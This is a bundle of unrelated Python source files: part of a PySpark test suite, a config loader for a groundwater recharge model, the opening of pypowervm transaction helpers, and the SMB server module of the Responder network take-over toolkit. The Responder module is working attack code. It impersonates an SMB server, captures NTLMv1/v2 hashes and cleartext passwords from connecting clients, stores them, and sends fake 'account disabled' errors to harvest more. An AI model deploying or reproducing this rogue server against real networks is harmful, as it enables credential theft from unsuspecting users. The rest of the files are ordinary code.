[1, 1, 1, 2])
self.assertEqual(
sorted(df.select(functions.collect_set(df.value).alias('r')).collect()[0].r),
["1", "2"])
self.assertEqual(
sorted(df.select(functions.collect_list(df.value).alias('r')).collect()[0].r),
["1", "2", "2", "2"])
def test_limit_and_take(self):
df = self.spark.range(1, 1000, numPartitions=10)
def assert_runs_only_one_job_stage_and_task(job_group_name, f):
tracker = self.sc.statusTracker()
self.sc.setJobGroup(job_group_name, description="")
f()
jobs = tracker.getJobIdsForGroup(job_group_name)
self.assertEqual(1, len(jobs))
stages = tracker.getJobInfo(jobs[0]).stageIds
self.assertEqual(1, len(stages))
self.assertEqual(1, tracker.getStageInfo(stages[0]).numTasks)
# Regression test for SPARK-10731: take should delegate to Scala implementation
assert_runs_only_one_job_stage_and_task("take", lambda: df.take(1))
# Regression test for SPARK-17514: limit(n).collect() should the perform same as take(n)
assert_runs_only_one_job_stage_and_task("collect_limit", lambda: df.limit(1).collect())
def test_datetime_functions(self):
from pyspark.sql import functions
from datetime import date
df = self.spark.range(1).selectExpr("'2017-01-22' as dateCol")
parse_result = df.select(functions.to_date(functions.col("dateCol"))).first()
self.assertEquals(date(2017, 1, 22), parse_result['to_date(`dateCol`)'])
def test_unbounded_frames(self):
from pyspark.sql import functions as F
from pyspark.sql import window
df = self.spark.range(0, 3)
def rows_frame_match():
return "ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING" in df.select(
F.count("*").over(window.Window.rowsBetween(-sys.maxsize, sys.maxsize))
).columns[0]
def range_frame_match():
return "RANGE BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING" in df.select(
F.count("*").over(window.Window.rangeBetween(-sys.maxsize, sys.maxsize))
).columns[0]
for new_maxsize in [2 ** 31 - 1, 2 ** 63 - 1, 2 ** 127 - 1]:
old_maxsize = sys.maxsize
sys.maxsize = new_maxsize
try:
# Manually reload window module to use monkey-patched sys.maxsize.
reload(window)
self.assertTrue(rows_frame_match())
self.assertTrue(range_frame_match())
finally:
sys.maxsize = old_maxsize
reload(window)
if __name__ == "__main__":
from pyspark.sql.tests.test_context import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
|
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: [email protected]
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from random import randrange
from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data
from SocketServer import BaseRequestHandler
from utils import *
import struct
import re
def Is_Anonymous(data): # Detect if SMB auth was Anonymous
SecBlobLen = struct.unpack('<H',data[51:53])[0]
if SecBlobLen < 260:
LMhashLen = struct.unpack('<H',data[89:91])[0]
return LMhashLen in [0, 1]
elif SecBlobLen > 260:
LMhashLen = struct.unpack('<H',data[93:95])[0]
return LMhashLen in [0, 1]
def Is_LMNT_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
return LMhashLen in [0, 1]
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(0, 16):
if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00'
def midcalc(data): #Set MID SMB Header field.
return data[34:36]
def uidcalc(data): #Set UID SMB Header field.
return data[32:34]
def pidcalc(data): #Set PID SMB Header field.
pack=data[30:32]
return pack
def tidcalc(data): #Set TID SMB Header field.
pack=data[28:30]
return pack
def ParseShare(data):
packet = data[:]
a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
if a:
print text("[SMB] Requested Share : %s" % a.group(0).decode('UTF-16LE'))
def GrabMessageID(data):
Messageid = data[28:36]
return Messageid
def GrabCreditRequested(data):
CreditsRequested = data[18:20]
if CreditsRequested == "\x00\x00":
CreditsRequested = "\x01\x00"
else:
CreditsRequested = data[18:20]
return CreditsRequested
def GrabCreditCharged(data):
CreditCharged = data[10:12]
return CreditCharged
def GrabSessionID(data):
SessionID = data[44:52]
return SessionID
def ParseSMBHash(data,client, Challenge): #Parse SMB NTLMSSP v1/v2
SSPIStart = data.find('NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, Challenge.encode('hex'))
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
def ParseSMB2NTLMv2Hash(data,client, Challenge): #Parse SMB NTLMv2
SSPIStart = data[113:]
data = data[113:]
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[22:24])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[30:32])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',data[38:40])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMBv2',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
def ParseLMNTHash(data, client, Challenge): # Parse SMB NTLMv1/v2
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
if NthashLen > 25:
FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
LmHash = FullHash[:32].upper()
NtHash = FullHash[32:].upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, Challenge.encode('hex'), LmHash, NtHash)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
if NthashLen == 24:
NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
LmHash = data[65:65+LMhashLen].encode('hex').upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, Challenge.encode('hex'))
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
def IsNT4ClearTxt(data, client):
HeadLen = 36
if data[14:16] == "\x03\x80":
SmbData = data[HeadLen+14:]
WordCount = data[HeadLen]
ChainedCmdOffset = data[HeadLen+1]
if ChainedCmdOffset == "\x75":
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
def handle(self):
try:
self.ntry = 0
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
Challenge = RandomChallenge()
if not data:
break
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
##Negotiate proto answer SMBv2.
if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data):
head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
t = SMB2NegoAns()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 1 answer SMBv2.
if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
head = SMB2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
t = SMB2NegoAns(Dialect="\x10\x02")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 2 answer SMBv2.
if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0")
t = SMB2Session1Data(NTLMSSPNtServerChallenge=Challenge)
t.calculate()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Session Setup 3 answer SMBv2.
if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
ParseSMB2NTLMv2Hash(data, self.client_address[0], Challenge)
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
t = SMB2Session2Data()
packet1 = str(head)+str(t)
buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
# Negotiate Protocol Response smbv1
if data[8:10] == "\x72\x00" and data[4:5] == "\xff" and re.search("SMB 2.\?\?\?", data) == None:
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x73\x00" and data[4:5] == "\xff": # Session Setup AndX Request smbv1
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
else:
Body = SMBSession1Data(NTLMSSPNtServerChallenge=Challenge)
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x73\x00" and data[4:5] == "\xff": # STATUS_SUCCESS
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data,self.client_address[0], Challenge)
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
# Send ACCOUNT_DISABLED to get multiple hashes if there are any
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
self.ntry += 1
continue
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x75\x00" and data[4:5] == "\xff": # Tree Connect AndX Request
ParseShare(data)
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x71\x00" and data[4:5] == "\xff": #Tree Disconnect
Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\xa2\x00" and data[4:5] == "\xff": #NT_CREATE Access Denied.
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x25\x00" and data[4:5] == "\xff": # Trans2 Access Denied.
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x74\x00" and data[4:5] == "\xff": # LogOff
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
class SMB1LM(BaseRequestHandler): # SMB Server class, old version
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
Challenge = RandomChallenge()
if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x72\x00": #Negotiate proto answer.
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge)
Body.calculate()
Packet = str(head)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
if data[8:10] == "\x73\x00": #Session Setup AndX Request
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
ParseLMNTHash(data,self.client_address[0], Challenge)
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head) + str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except Exception:
self.request.close()
pass
|
|
# ===============================================================================
# Copyright 2017 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
# ============= local library imports ==========================
import os
import sys
from datetime import datetime
import yaml
from app.paths import paths
from recharge import STATIC_KEYS, INITIAL_KEYS
DEFAULT_CFG = '''
---
input_root: Please Set Me ## /Volumes/Seagate Expansion Drive/ETRM_input
output_root: Please Set Me ## /Users/ross/Desktop
# === START (No earlier than year 2000) ===
start_day: SET ME # dd
start_month: SET ME # mm
start_year: SET ME # YYYY
# === Finish (No later than year 2013) ===
end_day: SET ME #dd
end_month: SET ME # mm
end_year: SET ME # YYYY
# === MASKS ===
mask: SET ME # mask of study area (e.g. Mask/my_mask.tif)
binary_shapefile: SET ME # Set path to raster for individual tracker output (e.g binary_shapefile/my_b_shp.tif)
polygons: Blank_Geo # (default)
tiff_shape: None
# === Saving specific dates as rasters ===
save_dates: [] # list in format -> 'mm/dd/YYY' such as ['mm/dd/YYY', 'mm/dd/YYY', 'mm/dd/YYY']
write_freq: SET ME # modify to output monthly or yearly rasters. OPTIONS -> daily|monthly|yearly
daily_outputs:[dr, de, drew] # OPTIONS -> anything that appears in the tracker
#==== To track change between two consecutive time periods ===
use_period_change = False # Set to True to work
# === Settings that handle the stochastic rainfall runoff method
seed = 123456789 # A default seed to make the stochastic behaviour of the model to be replicated
use_walnut_gulch_ro = True # Uses Esther Xu (Xu Thesis 2018) stochastic runoff method based on Walnut Gulch watershed.
#Otherwise RO is linearly decided based on Amy Lewis data
use_monsoon_precip_correction = True # Uses Xu correction to PRISM based on Walnut Gulch watershed precip vs PRISM
use_mountain_precip_correction = False # Corrects precip based on Amy Lewis
# === Misc settings ===
is_reduced: False # (default)
winter_evap_limiter: 0.3 # (default)
polygons: Blank_Geo # (default)
evap_ceff: 1.0 # (default)
ro_reinf_frac: 0.0 # (default) Runoff Reinfiltration Fraction. To increase runoff into soil.
rew_ceff: 1.0 # (default)
output_units: mm # (default) OPTIONS -> mm|acre-ft|?
winter_end_day: 92 # (default)
winter_start_day: 306 # (default)
use_individual_kcb: True # (default)
new_mexico_extent: True
# === Don't Change ===
swb_mode: fao # FAO 56 Water Balance Method
use_verify_paths: True
# === individual pixel tracker related ===
plot_output: SET ME # (for plots of the binary shapefile pixel tracker time series)
xplot: ['Date'] # (default)
yplot: ['rain', 'eta', 'rzsm'] # (default) OPTIONS -> anything in master dict.
# # === TAW parametrization (default is commented out) ====
# taw_modification: 1.0 # (default) Will increase TAW by a specified factor.
# uniform_taw: 25 # changes entire raster to a given TAW value
'''
DATETIME_FMT = '%m/%d/%Y'
class RunSpec:
_obj = None
nlcd_name = None
dem_name = None
aspect_name = None
slope_name = None
x_cord_name = None
y_cord_name = None
mask = None
polygons = None
input_root = None
output_root = None
output_path = None
write_freq = None
use_verify_paths = None
uniform_taw = None
taw_modification = 1.0
ro_reinf_frac = 0.0
swb_mode = 'fao'
rew_ceff = 1.0
evap_ceff = 1.0
winter_evap_limiter = 0.3
winter_end_day = 92
winter_start_day = 306
output_units = 'acre-ft'
is_reduced = False
binary_shapefile = None # TODO point_tracker
new_mexico_extent = False
xplot = None
yplot = None
plot_output = None
tiff_shape = None
use_walnut_gulch_ro = True
seed = 123456789
use_monsoon_precip_correction = True
use_mountain_precip_correction = False
pvalue = None
def __init__(self, obj):
self._obj = obj
attrs = ('mask', 'polygons', 'use_individual_kcb',
'input_root', 'output_root', 'write_freq', 'use_verify_paths',
'nlcd_name', 'dem_name', 'aspect_name', 'slope_name',
'taw_modification',
'ro_reinf_frac', 'swb_mode', 'rew_ceff', 'evap_ceff',
'winter_evap_limiter', 'winter_end_day', 'winter_start_day',
'output_units', 'is_reduced', 'uniform_taw', 'binary_shapefile', 'new_mexico_extent',
'tiff_shape',
'xplot', 'yplot', 'plot_output',
'use_walnut_gulch_ro',
'seed',
'use_monsoon_precip_correction',
'use_mountain_precip_correction',
'pvalue') # GELP removed 'output_path', 'x_cord_name','y_cord_name', 5/4/2017
# print 'the attributes', attrs
for attr in attrs:
# print "last attr out", attr
setattr(self, attr, self._obj.get(attr))
initial = self._obj.get('initial')
if initial:
for attr in INITIAL_KEYS:
setattr(self, attr, initial.get(attr))
static = self._obj.get('static')
if static:
for attr in STATIC_KEYS:
setattr(self, attr, static.get(attr))
@property
def initial_pairs(self):
try:
return tuple((k, getattr(self, k)) for k in INITIAL_KEYS)
except AttributeError:
pass
@property
def static_pairs(self):
try:
return tuple((k, getattr(self, k)) for k in STATIC_KEYS)
except AttributeError:
pass
@property
def save_dates(self):
sd = self._obj.get('save_dates')
if sd:
return [datetime.strptime(s, DATETIME_FMT) for s in sd]
@property
def date_range(self):
obj = self._obj
if 'start_year' in obj:
return (datetime(obj['start_year'],
obj['start_month'],
obj['start_day']),
datetime(obj['end_year'],
obj['end_month'],
obj['end_day']))
else:
return (datetime.strptime(obj['start_date'], DATETIME_FMT),
datetime.strptime(obj['end_date'], DATETIME_FMT))
@property
def daily_outputs(self):
return self._obj.get('daily_outputs', [])
class Config:
runspecs = None
path = None
def __init__(self, path=None):
self.load(path=path)
def load(self, path=None):
if path is None:
path = paths.config
if isinstance(path, (str, unicode)):
check_config(path)
rfile = open(path, 'r')
else:
rfile = path
# print paths.config
# print rfile
# rfile = path
# for doc in yaml.load_all(rfile):
# if doc != None:
# print doc
# else:
# print "here's the bad one"
# print doc
self.runspecs = [RunSpec(doc) for doc in yaml.load_all(rfile)]
print "runspecs", self.runspecs
rfile.close()
self.path = path
# self.runspecs = [RunSpec(i, doc) for i, doc in enumerate(yaml.load_all(rfile))]
# rfile.close()
def check_config(path=None):
if path is None:
path = paths.config
if not os.path.isfile(path):
print '***** The config file {} does not exist. A default one will be written'.format(path)
with open(path, 'w') as wfile:
print '-------------- DEFAULT CONFIG -----------------'
print DEFAULT_CFG
print '-----------------------------------------------'
wfile.write(DEFAULT_CFG)
print '***** Please edit the config file at {} and rerun the model'.format(path)
sys.exit()
# ============= EOF =============================================
|
|
# Copyright 2015, 2017 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from concurrent.futures import thread as th
import oslo_concurrency.lockutils as lock
import oslo_context.context as ctx
from oslo_log import log as logging
from oslo_utils import reflection
import six
from taskflow import engines as tf_eng
from taskflow import exceptions as tf_ex
from taskflow.patterns import linear_flow as tf_lf
from taskflow.patterns import unordered_flow as tf_uf
from taskflow import task as tf_task
import threading
import pypowervm.exceptions as ex
from pypowervm.i18n import _
from pypowervm.utils import retry
import pypowervm.wrappers.entry_wrapper as ewrap
LOG = logging.getLogger(__name__)
_local = threading.local()
def _get_locks():
"""Returns the list of UUIDs locked by this thread."""
locks = getattr(_local, 'entry_transaction', None)
if locks is None:
locks = []
_set_locks(locks)
return locks
def _set_locks(locks):
"""Sets the list of UUIDs locked by this thread."""
_local.entry_transaction = locks
def entry_transaction(func):
"""Decorator to facilitate transaction semantics on a PowerVM object.
Typically, a method thus decorated will make some set of changes to an
EntryWrapper and then perform one or more REST operations thereon.
The *consumer* of the decorated method may pass either an EntryWrapper or
an EntryWrapperGetter as the first argument. The *developer* of the
decorated method is guaranteed that the first argument is an EntryWrapper.
This decorator provides three things:
1) The decorated method may be invoked with either an EntryWrapper or an
EntryWrapperGetter as its first argument. However, within the body of the
method, that argument is guaranteed to be the appropriate EntryWrapper.
2) The decorated method is locked on the UUID of the PowerVM object on
which it operates (represented by its first argument). Only one method
thus decorated can operate on that PowerVM object at one time.
3) If the decorated method fails due to an etag mismatch - indicating that
the wrapper was updated out-of-band between when it was retrieved and when
it was updated - the wrapper is refreshed and the entire method is
redriven.
Note: If the etag mistmatch occurs, the STEPPED_DELAY function is used
from the retry.py. This provides a gradual increase in the delay (except
for the first retry - which is immediate). A maximum number of 6 retries
will occur.
Example usage:
@entry_transaction
def add_gizmos_to_vios_wrapper(vios_wrapper, gizmos):
vios_wrapper.gizmo_list.extend(gizmos)
return vios_wrapper.update()
This method can then be invoked either as:
add_gizmos_to_vios_wrapper(existing_vios_wrapper, gizmos)
or as:
add_gizmos_to_vios_wrapper(pvm_vios.VIOS.getter(adapter, uuid), gizmos)
"""
def _synchronize(wrp_or_spec, *a1, **k1):
"""Returned method is synchronized on the object's UUID."""
@lock.synchronized(wrp_or_spec.uuid)
def _locked_resolve_wrapper(wos, *a2, **k2):
try:
# The synchronized decorator will hold off other threads
# we just have to hold off lock attempts by methods further
# down the stack.
_get_locks().append(wrp_or_spec.uuid)
return _resolve_wrapper(wos, *a2, **k2)
finally:
_get_locks().remove(wrp_or_spec.uuid)
def _resolve_wrapper(wos, *a2, **k2):
"""Returned method guaranteed to be called with a wrapper."""
if isinstance(wos, ewrap.EntryWrapperGetter):
wos = wos.get()
@retry.retry(argmod_func=retry.refresh_wrapper, tries=60,
delay_func=retry.STEPPED_RANDOM_DELAY)
def _retry_refresh(wrapper, *a3, **k3):
"""Retry as needed, refreshing its wrapper each time."""
return func(wrapper, *a3, **k3)
return _retry_refresh(wos, *a2, **k2)
def _lock_if_needed(wos, *a2, **k2):
# Check if this UUID is already locked
if wrp_or_spec.uuid in _get_locks():
# It's already locked by this thread, so skip the lock.
return _resolve_wrapper(wos, *a2, **k2)
else:
return _locked_resolve_wrapper(wos, *a2, **k2)
return _lock_if_needed(wrp_or_spec, *a1, **k1)
return _synchronize
@six.add_metaclass(abc.ABCMeta)
class Subtask(object):
"""A single EntryWrapper modification to be performed within a WrapperTask.
A subclass performs its work by overriding the execute method. That method
may or may not make changes to the EntryWrapper, which is its first
argument. Its return value must indicate whether changes were made to the
wrapper: this is the trigger used by WrapperTask to determine whether to
POST the changes back to the REST server via update(). The return value is
saved by the surrounding WrapperTask if the 'provides' argument is used on
initialization. This value can then be retrieved by subsequent Subtasks.
A Subtask should never update() or refresh() the wrapper. That is handled
by the surrounding WrapperTask.
See WrapperTask for example usage.
"""
def __init__(self, *save_args, **save_kwargs):
"""Create the Subtask, saving execution arguments for later.
:param save_args: Positional arguments to be passed to the execute
method - *after* the wrapper - when it is invoked
under a WrapperTask.
